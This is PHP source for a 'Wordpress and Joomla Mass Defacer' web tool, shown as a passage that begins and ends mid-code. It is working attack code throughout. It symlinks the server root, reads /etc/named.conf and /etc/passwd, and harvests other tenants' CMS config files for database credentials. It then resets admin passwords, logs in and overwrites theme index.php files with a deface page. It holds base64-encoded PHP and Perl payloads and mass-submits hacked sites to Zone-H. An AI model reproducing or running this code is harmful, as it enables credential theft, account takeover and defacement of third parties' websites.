echo "Total unique domain: $total<br /><br />";
echo '<table style="width:50%;">';
echo '<tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>DID</th><th>Domain</th><th>Status</th></tr>';
$j = 1;
$dc = 0;
$sites = array();
$prob_s = array();
foreach($items as $s) {
$data = file_get_contents('http://'.$s);
$cond = strpos($data, 'hacked');
$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
if($cond !== false){
echo '<tr '.$cls.'><td>'.$j.'</td><td>'.($dc+1).'</td><td><a href="http://'.$s.'" target="_blank">'.$s.'</a></td><td><span class="green">DEFACED</span></td></tr>';
$sites[] = $s;
$dc++;
} else {
echo '<tr '.$cls.'><td>'.$j.'</td><td> </td><td><a href="http://'.$s.'" target="_blank">'.$s.'</a></td><td><span class="red">NOT DEFACED</span></td></tr>';
$prob_s[] = $s;
}
$j++;
}
echo '</table><br />';
file_put_contents('org_def.html','http://'.implode('<br/>http://',$sites));
file_put_contents('fail_def.html','http://'.implode('<br/>http://',$prob_s));
$total = $dc;
echo '<h3 style="text-align: center;">Total Defaced = '.$total.'</h3>';
echo '<h3 style="text-align: center;"><a href="org_def.html" target="_blank">Originaly Defaced Sites List</a> | <a href="fail_def.html" target="_blank">Failed Defaced Sites List</a></h3><br />';
echo '<h3 style="text-align: center;">Submitting to Zone-H</h3>';
echo '<table style="width:50%;">';
$main=curl_multi_init();
$pause=10;
for($m=0;$m<3;$m++) { $http[] = curl_init(); }
for($n=0;$n<$total;$n +=30) {
for($x=0;$x<30;$x++) {
if($sites[$n+$x]!='') {
echo'<tr class="even"><td>'.rtrim($sites[$n+$x]).'</td><td>DONE!!!</td></tr>';
}
}
$d=$n+30;
if($d>$total){$d=$total;}
echo '<tr class="odd"><td colspan="2" style="text-align:center;">'.$d.' of '.$total.' Done</td></tr>';
for($w=0;$w<3;$w++) {
$p=$w * 10;
if(!(isset($sites[$n+$p]))){$pause=$w;break;}
$posts[$w]="defacer=".$hacker."&domain1=http%3A%2F%2F".rtrim($sites[$n+$p])."&domain2=http%3A%2F%2F".rtrim($sites[$n+$p+1])."&domain3=http%3A%2F%2F".rtrim($sites[$n+$p+2])."&domain4=http%3A%2F%2F".rtrim($sites[$n+$p+3])."&domain5=http%3A%2F%2F".rtrim($sites[$n+$p+4])."&domain6=http%3A%2F%2F".rtrim($sites[$n+$p+5])."&domain7=http%3A%2F%2F".rtrim($sites[$n+$p+6])."&domain8=http%3A%2F%2F".rtrim($sites[$n+$p+7])."&domain9=http%3A%2F%2F".rtrim($sites[$n+$p+8])."&domain10=http%3A%2F%2F".rtrim($sites[$n+$p+9])."&hackmode=14&reason=5&submit=Send";
$curlopt=array(CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0',CURLOPT_RETURNTRANSFER => true,CURLOPT_FOLLOWLOCATION =>true,CURLOPT_POST => true, CURLOPT_URL => 'http://www.zone-h.com/notify/mass',CURLOPT_POSTFIELDS => $posts[$w]);
curl_setopt_array($http[$w],$curlopt);
curl_multi_add_handle($main,$http[$w]);
}
$running = null;
do{
curl_multi_exec($main,$running);
} while($running > 0);
for($m=0;$m<3;$m++) {
if($pause==$m){break;}
curl_multi_remove_handle($main, $http[$m]);
$code = curl_getinfo($http[$m], CURLINFO_HTTP_CODE);
if ($code != 200) {
while(true){
echo'<tr class="odd"><td colspan="2" style="text-align:center;">Server Error Retrying...</td></tr>';
sleep(5);
curl_exec($http[$m]);
$code = curl_getinfo($http[$m], CURLINFO_HTTP_CODE);
if( $code== 200){break 1;}
}
}
}
}
echo '<tr class="odd"><td colspan="2" style="text-align:center;">Finished!!</td></tr></table>';
echo '<h3 style="text-align: center;"><a href="org_def.html" target="_blank">Originaly Defaced Sites List</a> | <a href="fail_def.html" target="_blank">Failed Defaced Sites List</a></h3><br />';
curl_multi_close($main);
}
echo '<!DOCTYPE html>
<html>
<head>
<title>Joomla ~ Wordpress Mass Defacer</title>
<link href="http://fonts.googleapis.com/css?family=Orbitron:700" rel="stylesheet" type="text/css">
<style type="text/css">
table,body {
background:
url("https://d33ds.co/img/bg3.png") repeat ,
url("https://d33ds.co/img/bglight.png") no-repeat center top,top left,top right,
url("https://d33ds.co/img/bg2.png") repeat top left;
background-color: #ffffff;
color:white;
font-family: "Trebuchet MS",Arial;background-attachment:fixed;margin:0;padding:0;}
.header {position:fixed;width:100%;top:0;background:#000;}
.footer {position:fixed;width:100%;bottom:0;background:#000;}
input[type="submit"]{background-color:rgba(25,25,25,0.6);border:1; padding:2px; border-bottom:2px solid white; font-size:25px;font-family:orbitron; color:red;border:2px solid white;margin:4px 4px 8px 0;}
input[type="submit"]:hover{color:SeaShell;}
input[type="text"]:hover{color:SeaShell;}
input[type="radio"]{margin-top: 0;}
.td2 {border-left:1px solid red;border-radius: 2px 2px 2px 2px;}
input[type="text"] {background:#111111; border:1; padding:2px; border-bottom:2px solid #393939;font-family:orbitron; font-size:25px; color:#ffffff;border:2px solid #4C83AF;margin:4px 4px 8px 0;}
.even {background-color: rgba(25, 25, 25, 0.6);}
.odd {background-color: rgba(102, 102, 102, 0.6);}
a {color:#fff;} a:hover {color:#00BFFF;}
fieldset{border: 1px solid grey; background: rgba(0,0,0,0.7); width: 600px; margin: 0 auto;min-height:240px;}
textarea{background: rgba(0,0,0,0.6); color: white;}
.green {color:#00FF00;font-weight:bold;}
.red {color:#FF0000;font-weight:bold;}
.killme {position: fixed; top: 20px; right: 20px; border: 2px solid yellow; padding: 10px; font-size: 20px; color: red; font-weight: bold;}
</style>
<script type="text/javascript">
function change() {
if(document.getElementById(\'rcd\').checked == true) {
document.getElementById(\'tra\').style.display = \'\';
} else {
document.getElementById(\'tra\').style.display = \'none\';
}
}
function hide() {
document.getElementById(\'tra\').style.display = \'none\';
}
</script>
</head>
<body>
<div class="footer">
<h3 style="text-align: center;">© K2ll33d <a href="http://facebook.com/k2ll33d" target="_blank"><img src="https://fbstatic-a.akamaihd.net/rsrc.php/yP/r/Ivn-CVe5TGK.ico" width=30></a></h3>
</div>
<h2 style="color:#00ff00;text-align: center;font-family:orbitron;text-shadow: 6px 6px 6px black;">Wordpress and Joomla Mass Defacer</h2>';
if(!isset($_POST['form_action']) && !isset($_GET['zh']) && !isset($_GET['mode']) && !isset($_GET['kill'])){
echo '<div align="center">
<form action="" method="post">
<table>
<tr><td><input type="radio" value="1" name="mode" checked="checked" onclick="hide();"></td><td>using /etc/named.conf ('.(is_readable('/etc/named.conf')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr>
<tr><td><input type="radio" value="2" name="mode" onclick="hide();"></td><td>using /etc/passwd ('.(is_readable('/etc/passwd')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr>
<tr><td><input type="radio" value="2" name="mode" id="rcd" onclick="change();"></td><td>manual copy of /etc/passwd</td></tr>
<tr id="tra" style="display: none;"><td></td><td><textarea cols="40" rows="5" name="man_data"></textarea></td></tr>
</table>
<br />
<input type="hidden" name="form_action" value="1">
<table>
<tr><td><b>index url: </b><input size="35" type="text" name="defpage" value=""></tr></td>
<tr><td><b>Defacer : </b></b><input size="35" type="text" name="defacer" value="Joker Dark Knight"></tr></td>
</table>
<input class=submit type="submit" value="Attack !" name="Submit">
</form>';
}
$milaf_el_index = $_POST['defpage'];
$hacker = $_POST['defacer'];
if($_POST['form_action'] == 1) {
if($_POST['mode']==1) { exec_mode_1($milaf_el_index); }
if($_POST['mode']==2) { exec_mode_2($milaf_el_index); }
if($_POST['mode']==3) { exec_mode_3($milaf_el_index); }
}
if(isset($_GET['zh']) && $_GET['zh']==1) { submit_zone_h($hacker); }
if($_GET['mode']==1) { exec_mode_1($milaf_el_index); }
echo '</body>
</html>';
error_reporting(0);
function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
$ar0=explode($marqueurDebutLien, $text);
$ar1=explode($marqueurFinLien, $ar0[$i]);
return trim($ar1[0]);
}
function randomt() {
$chars = "abcdefghijkmnopqrstuvwxyz023456789";
srand((double)microtime()*1000000);
$i = 0;
$pass = '';
while ($i <= 7) {
$num = rand() % 33;
$tmp = substr($chars, $num, 1);
$pass = $pass . $tmp;
$i++;
}
return $pass;
}
function index_changer_wp($conf, $content) {
$output = '';
$dol = '$';
$go = 0;
$username = entre2v2($conf,"define('DB_USER', '","');");
$password = entre2v2($conf,"define('DB_PASSWORD', '","');");
$dbname = entre2v2($conf,"define('DB_NAME', '","');");
$prefix = entre2v2($conf,$dol."table_prefix = '","'");
$host = entre2v2($conf,"define('DB_HOST', '","');");
$link=mysql_connect($host,$username,$password);
if($link) {
mysql_select_db($dbname,$link) ;
$dol = '$';
$req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '4297f44b13955235245b2497399d7a93' WHERE `ID` = 1");
} else {
$output.= "[-] DB Error<br />";
}
if($req1) {
$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
$data = mysql_fetch_array($req);
$site_url=$data["option_value"];
$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");
$data = mysql_fetch_array($req);
$template = $data["option_value"];
$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");
$data = mysql_fetch_array($req);
$current_theme = $data["option_value"];
$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
$url2=$site_url."/wp-login.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=123123&rememberme=forever&wp-submit=Log In&testcookie=1");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer = curl_exec($ch);
$pos = strpos($buffer,"action=logout");
if($pos === false) {
$output.= "[-] Login Error<br />";
} else {
$output.= "[+] Login Successful<br />";
$go = 1;
}
if($go) {
$cond = 0;
$url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer0 = curl_exec($ch);
$_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
$_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
if(substr_count($_file,"/index.php") != 0){
$output.= "[+] index.php loaded in Theme Editor<br />";
$url2=$site_url."/wp-admin/theme-editor.php";
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer = curl_exec($ch);
curl_close($ch);
$pos = strpos($buffer,'<div id="message" class="updated">');
if($pos === false) {
$output.= "[-] Updating Index.php Error<br />";
} else {
$output.= "[+] Index.php Updated Successfuly<br />";
$hk = explode('public_html',$_file);
$output.= '[+] Deface '.file_get_contents($site_url.str_replace('/blog','',$hk[1]));
$cond = 1;
}
} else {
$url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.$template;
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer0 = curl_exec($ch);
$_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
$_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
if(substr_count($_file,"index.php") != 0){
$output.= "[+] index.php loaded in Theme Editor<br />";
$url2=$site_url."/wp-admin/theme-editor.php";
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&theme=".$template."&_wpnonce=".$_wpnonce."&submit=Update File");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer = curl_exec($ch);
curl_close($ch);
$pos = strpos($buffer,'<div id="message" class="updated">');
if($pos === false) {
$output.= "[-] Updating Index.php Error<br />";
} else {
$output.= "[+] Index.php Template Updated Successfuly<br />";
$output.= '[+] Deface '.file_get_contents($site_url.'/wp-content/themes/'.$template.'/index.php');
$cond = 1;
}
} else {
$output.= "[-] index.php can not load in Theme Editor<br />";
}
}
}
} else {
$output.= "[-] DB Error<br />";
}
global $base_path;
unlink($base_path.'COOKIE.txt');
return array('cond'=>$cond, 'output'=>$output);
}
function index_changer_joomla($conf, $content, $domain) {
$doler = '$';
$username = entre2v2($conf, $doler."user = '", "';");
$password = entre2v2($conf, $doler."password = '", "';");
$dbname = entre2v2($conf, $doler."db = '", "';");
$prefix = entre2v2($conf, $doler."dbprefix = '", "';");
$host = entre2v2($conf, $doler."host = '","';");
$co=randomt();
$site_url = "http://".$domain."/administrator";
$output = '';
$cond = 0;
$link=mysql_connect($host, $username, $password);
if($link) {
mysql_select_db($dbname,$link) ;
$req1 = mysql_query("UPDATE `".$prefix."users` SET `username` ='admin' , `password` = '4297f44b13955235245b2497399d7a93', `usertype` = 'Super Administrator', `block` = 0");
$req = mysql_numrows(mysql_query("SHOW TABLES LIKE '".$prefix."extensions'"));
} else {
$output.= "[-] DB Error<br />";
}
if($req1){
if ($req) {
$req = mysql_query("SELECT * from `".$prefix."template_styles` WHERE `client_id` = '0' and `home` = '1'");
$data = mysql_fetch_array($req);
$template_name = $data["template"];
$req = mysql_query("SELECT * from `".$prefix."extensions` WHERE `name`='".$template_name."' or `element` = '".$template_name."'");
$data = mysql_fetch_array($req);
$template_id = $data["extension_id"];
$url2=$site_url."/index.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$return = entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
$hidden = entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);
if($return && $hidden) {
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_REFERER, $url2);
curl_setopt($ch, CURLOPT_POSTFIELDS, "username=admin&passwd=123123&option=com_login&task=login&return=".$return."&".$hidden."=1");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$pos = strpos($buffer,"com_config");
if($pos === false) {
$output.= "[-] Login Error<br />";
} else {
$output.= "[+] Login Successful<br />";
}
}
if($pos){
$url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
if($hidden2) {
$output.= "[+] index.php file found in Theme Editor<br />";
} else {
$output.= "[-] index.php Not found in Theme Editor<br />";
}
}
if($hidden2) {
$url2=$site_url."/index.php?option=com_templates&layout=edit";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$content."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
curl_close($ch);
$pos = strpos($buffer,'<dd class="message message">');
$cond = 0;
if($pos === false) {
$output.= "[-] Updating Index.php Error<br />";
} else {
$output.= "[+] Index.php Template successfully saved<br />";
$cond = 1;
}
}
}
else {
$req =mysql_query("SELECT * from `".$prefix."templates_menu` WHERE client_id='0'");
$data = mysql_fetch_array($req);
$template_name=$data["template"];
$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
$url2=$site_url."/index.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);
if($hidden) {
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456&option=com_login&task=login&".$hidden."=1");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$pos = strpos($buffer,"com_config");
if($pos === false) {
$output.= "[-] Login Error<br />";
} else {
$output.= "[+] Login Successful<br />";
}
}
if($pos) {
$url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
if($hidden2) {
$output.= "[+] index.php file founded in Theme Editor<br />";
} else {
$output.= "[-] index.php Not found in Theme Editor<br />";
}
}
if($hidden2) {
$url2=$site_url."/index.php?option=com_templates&layout=edit";
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$content."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
curl_close($ch);
$pos = strpos($buffer,'<dd class="message message fade">');
$cond = 0;
if($pos === false) {
$output.= "[-] Updating Index.php Error<br />";
} else {
$output.= "[+] Index.php Template successfully saved<br />";
$cond = 1;
}
}
}
} else {
$output.= "[-] DB Error<br />";
}
global $base_path;
unlink($base_path.$co);
return array('cond'=>$cond, 'output'=>$output);
}
function exec_mode_1($def_url) {
@mkdir('sym',0777);
$wr = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
$fp = @fopen ('sym/.htaccess','w');
fwrite($fp, $wr);
@symlink('/','sym/root');
$dominios = @file_get_contents("/etc/named.conf");
@preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
$out[1] = array_unique($out[1]);
$numero_dominios = count($out[1]);
echo "Total domains: $numero_dominios <br><br />";
$def = file_get_contents($def_url);
$def = urlencode($def);
$def2 = 'PD9waHANCiRkZWYgPSBmaWxlX2dldF9jb250ZW50cyhcJ2h0dHA6Ly96b25laG1pcnJvcnMubmV0L2RlZmFjZWQvMjAxMy8wMS8xMy9iYWx0c3R1ZGlvLmx0L2luZGV4Lmh0bWxcJyk7DQokcCA9IGV4cGxvZGUoXCdwdWJsaWNfaHRtbFwnLGRpcm5hbWUoX19GSUxFX18pKTsNCiRwID0gJHBbMF0uXCdwdWJsaWNfaHRtbFwnOw0KaWYgKCRoYW5kbGUgPSBvcGVuZGlyKCRwKSkgew0KICAgICRmcDEgPSBAZm9wZW4oJHAuXCcvaW5kZXguaHRtbFwnLFwndytcJyk7DQogICAgQGZ3cml0ZSgkZnAxLCAkZGVmKTsNCiAgICAkZnAxID0gQGZvcGVuKCRwLlwnL2luZGV4LnBocFwnLFwndytcJyk7DQogICAgQGZ3cml0ZSgkZnAxLCAkZGVmKTsNCiAgICAkZnAxID0gQGZvcGVuKCRwLlwnL2luZGV4Lmh0bVwnLFwndytcJyk7DQogICAgQGZ3cml0ZSgkZnAxLCAkZGVmKTsNCiAgICBlY2hvIFwnRG9uZVwnOw0KfQ0KY2xvc2VkaXIoJGhhbmRsZSk7DQp1bmxpbmsoX19GSUxFX18pOw0KPz4=';
$base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';
$output = fopen('defaced.html', 'a+');
$_SESSION['count1'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count1']) ? $_SESSION['count1'] :0 ) : 0;
$_SESSION['count2'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count2']) ? $_SESSION['count2'] :0 ) : 0;
echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
$j = 1;
$st = (isset($_GET['st']) && $_GET['st']!='') ? $_GET['st'] : 0;
for($i = $st; $i <= $numero_dominios; $i++)
{
$domain = $out[1][$i];
$dono_arquivo = @fileowner("/etc/valiases/".$domain);
$infos = @posix_getpwuid($dono_arquivo);
if($infos['name']!='root') {
$config01 = @file_get_contents($base_url.$infos['name']."/public_html/configuration.php");
$config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");
$config03 = @file_get_contents($base_url.$infos['name']."/public_html/blog/wp-config.php");
$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
if($config01 && preg_match('/dbprefix/i',$config01)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="pink">JOOMLA</font></td>';
$res = index_changer_joomla($config01, $def, $domain);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$_SESSION['count1'] = $_SESSION['count1'] + 1;
} else {
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
}
if($config02 && preg_match('/DB_NAME/i',$config02)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
$res = index_changer_wp($config02, $def2);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$_SESSION['count2'] = $_SESSION['count2'] + 1;
} else {
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
}
$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
if($config03 && preg_match('/DB_NAME/i',$config03)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
$res = index_changer_wp($config03, $def2);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$_SESSION['count2'] = $_SESSION['count2'] + 1;
} else {
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
}
}
}
echo '</table>';
echo '<hr/>';
echo 'Total Defaced = '.($_SESSION['count1']+$_SESSION['count2']).' (JOOMLA = '.$_SESSION['count1'].', WORDPRESS = '.$_SESSION['count2'].')<br />';
echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
if($_SESSION['count1']+$_SESSION['count2'] > 0){
echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
}
}
function exec_mode_2($def_url) {
$domains = @file_get_contents("/etc/named.conf");
@preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);
$out = array_unique($out[1]);
$num = count($out);
print("Total domains: $num<br><br />");
$def = file_get_contents($def_url);
$def = urlencode($def);
$output = fopen('defaced.html', 'a+');
$defaced = '';
$count1 = 0;
$count2 = 0;
echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
$j = 1;
$map = array();
foreach($out as $d) {
$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));
$map[$info['name']] = $d;
}
$dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHdkfTs
NCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2
h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19od
G1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwv
YmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRklMRSwgJy9ldGMvcGFzc3d
kJyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPCR5OyRrYSsrKXsNCiAgIC
